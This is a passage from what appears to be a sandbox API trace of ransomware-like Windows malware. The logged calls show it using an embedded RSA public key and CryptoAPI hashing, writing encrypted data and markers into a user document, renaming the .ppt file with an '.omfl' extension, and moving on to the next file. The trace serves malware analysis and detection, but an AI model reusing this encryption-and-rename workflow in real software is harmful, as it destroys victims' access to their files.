KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.965] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.965] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.965] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0131.966] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.966] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.966] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.966] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.966] GetLastError () returned 0x0 [0131.966] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0131.966] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0131.967] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.967] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.967] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.967] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.967] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.967] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.967] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.967] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17310 | out: hHeap=0x4970000) returned 1 [0131.967] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17328 | out: hHeap=0x4970000) returned 1 [0131.967] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0131.967] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0131.967] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0131.967] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0131.967] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0131.967] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17328 [0131.967] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdbc8 [0131.968] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd17310 [0131.968] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0131.968] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0131.968] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0131.968] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0131.968] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0131.968] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0131.968] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf168 [0131.968] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0131.968] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.968] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17328 | out: hHeap=0x4970000) returned 1 [0131.968] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.968] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17310 | out: hHeap=0x4970000) returned 1 [0131.968] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdbc8 | out: hHeap=0x4970000) returned 1 [0131.968] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.968] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0131.968] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0131.968] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08ea8 | out: hHeap=0x4970000) returned 1 [0131.968] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0131.968] GetCurrentThreadId () returned 0x618 [0131.968] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0131.968] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0xdd2e470 [0131.968] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750ca48 [0131.968] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0131.968] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0131.968] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0131.968] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0131.968] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0131.968] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.968] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.969] GetCurrentThreadId () returned 0x618 [0131.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.969] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0131.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.969] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.969] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.969] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0131.969] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c4e0 [0131.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0131.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0131.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0131.969] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0131.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0131.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0131.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0131.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0131.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0131.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17310 [0131.969] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0131.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e18 [0131.969] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0131.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0131.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0131.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17328 [0131.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0131.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdbc8 [0131.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0131.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd172f8 [0131.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0131.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17178 [0131.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0131.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0131.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17208 [0131.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0131.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0131.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17340 [0131.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0131.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17208 [0131.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0131.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8c0 [0131.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0131.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0131.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce8f58 [0131.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17310 | out: hHeap=0x4970000) returned 1 [0131.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17310 [0131.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0131.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd206b0 [0131.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0131.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0131.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0131.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0131.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0131.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0131.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0131.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75039b8 [0131.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17310 | out: hHeap=0x4970000) returned 1 [0131.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdd06f38 [0131.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0131.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0131.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0131.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24680 | out: hHeap=0x4970000) returned 1 [0131.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0131.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0131.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75039b8 | out: hHeap=0x4970000) returned 1 [0131.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0131.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd06f38 | out: hHeap=0x4970000) returned 1 [0131.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0131.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17340 | out: hHeap=0x4970000) returned 1 [0131.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0131.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0131.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdbc8 | out: hHeap=0x4970000) returned 1 [0131.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17328 | out: hHeap=0x4970000) returned 1 [0131.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd172f8 | out: hHeap=0x4970000) returned 1 [0131.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17560 | out: hHeap=0x4970000) returned 1 [0131.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0131.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0131.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd172e0 | out: hHeap=0x4970000) returned 1 [0131.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49db838 | out: hHeap=0x4970000) returned 1 [0131.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0131.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24890 | out: hHeap=0x4970000) returned 1 [0131.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c4e0 | out: hHeap=0x4970000) returned 1 [0131.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0131.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0131.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf168 | out: hHeap=0x4970000) returned 1 [0131.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0131.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0131.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0131.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.972] WriteFile (in: hFile=0x610, lpBuffer=0xdd35410*, nNumberOfBytesToWrite=0xd627, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0xdd35410*, lpNumberOfBytesWritten=0xe00fb14*=0xd627, lpOverlapped=0x0) returned 1 [0131.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd35410 | out: hHeap=0x4970000) returned 1 [0131.973] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0xd62c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.973] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0131.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5dc0 [0131.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0xdd19550 [0131.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0xdd19550, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0131.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0xdce69c8 [0131.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0131.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5dc0 | out: hHeap=0x4970000) returned 1 [0131.973] WriteFile (in: hFile=0x610, lpBuffer=0xdce69c8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdce69c8*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0131.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0131.973] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.973] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.973] CloseHandle (hObject=0x610) returned 1 [0131.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa0) returned 0xdcf0c20 [0131.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8b0) returned 0x74fb288 [0131.975] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf0c20 | out: hHeap=0x4970000) returned 1 [0131.975] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\nqALBKJhNLw9.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\nqalbkjhnlw9.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\nqALBKJhNLw9.ppt.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\nqalbkjhnlw9.ppt.omfl")) returned 1 [0131.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0131.977] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7d39010, ftCreationTime.dwHighDateTime=0x1d5e03b, ftLastAccessTime.dwLowDateTime=0xb32bcdc0, ftLastAccessTime.dwHighDateTime=0x1d5e814, ftLastWriteTime.dwLowDateTime=0xb32bcdc0, ftLastWriteTime.dwHighDateTime=0x1d5e814, nFileSizeHigh=0x0, nFileSizeLow=0x16d18, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PawJosFHZ0fIzCf-ldL_.odt", cAlternateFileName="PAWJOS~1.ODT")) returned 1 [0131.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0131.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xbe) returned 0x74e6bb8 [0131.977] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\PawJosFHZ0fIzCf-ldL_.odt") returned=".odt" [0131.977] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\PawJosFHZ0fIzCf-ldL_.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\pawjosfhz0fizcf-ldl_.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0131.977] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=93464) returned 1 [0131.978] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.980] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x16cf2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.980] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.981] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.981] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x16d18, lpOverlapped=0x0) returned 1 [0131.982] lstrlenA (lpString="-----BEGIN PUBLIC 